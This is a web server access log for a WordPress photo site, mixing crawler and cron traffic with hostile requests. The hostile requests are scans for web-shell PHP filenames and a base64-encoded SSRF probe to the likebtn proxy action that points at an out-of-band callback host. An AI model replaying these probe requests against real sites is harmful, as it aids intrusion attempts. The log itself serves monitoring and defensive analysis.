51.79.229.86 - - [18/Oct/2025:09:04:09 -0400] "GET /yanto.php HTTP/1.1" 404 10905 "http://salhab360photos.com/yanto.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:09:04:16 -0400] "GET /products68855364?kg=0068015747 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:09:04:17 -0400] "GET /yen.php HTTP/1.1" 404 10903 "http://salhab360photos.com/yen.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:04:21 -0400] "GET /yun.php HTTP/1.1" 404 10902 "http://salhab360photos.com/yun.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:04:23 -0400] "GET /yuna.php HTTP/1.1" 404 10899 "http://salhab360photos.com/yuna.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:09:04:25 -0400] "GET /products9053082?kg=0008942760 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:09:04:29 -0400] "POST /wp-cron.php?doing_wp_cron=1760792669.5761311054229736328125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.107 - - [18/Oct/2025:09:04:32 -0400] "GET /products6020886?kg=0005947542 HTTP/1.1" 200 31317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:09:03:05 -0400] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\" HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:09:02:59 -0400] "GET /products60904220?kg=0060161567 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:09:03:22 -0400] "POST /wp-cron.php?doing_wp_cron=1760792601.3682310581207275390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.61.153.107 - - [18/Oct/2025:09:03:26 -0400] "POST /wp-cron.php?doing_wp_cron=1760792606.3688509464263916015625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:09:03:05 -0400] "GET /sek.php HTTP/1.1" 404 10906 "http://salhab360photos.com/sek.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:09:03:28 -0400] "POST /wp-cron.php?doing_wp_cron=1760792608.5741639137268066406250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:09:03:36 -0400] "GET /uek.php HTTP/1.1" 404 10903 "http://salhab360photos.com/uek.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:39 -0400] "GET /vek.php HTTP/1.1" 404 10896 "http://salhab360photos.com/vek.php" "Go-http-client/2.0"
157.20.32.210 - user [18/Oct/2025:09:03:43 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0"
51.79.229.86 - - [18/Oct/2025:09:03:44 -0400] "GET /xek.php HTTP/1.1" 404 10905 "http://salhab360photos.com/xek.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:47 -0400] "GET /zek.php HTTP/1.1" 404 10896 "http://salhab360photos.com/zek.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:49 -0400] "GET /kent.php HTTP/1.1" 404 10896 "http://salhab360photos.com/kent.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:03:59 -0400] "GET /ipin.php HTTP/1.1" 404 10905 "http://salhab360photos.com/ipin.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:04:07 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0"
51.79.229.86 - - [18/Oct/2025:09:04:10 -0400] "GET /yon.php HTTP/1.1" 404 10905 "http://salhab360photos.com/yon.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:04:11 -0400] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 404 12307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:04:12 -0400] "GET /yan.php HTTP/1.1" 404 10903 "http://salhab360photos.com/yan.php" "Go-http-client/2.0"
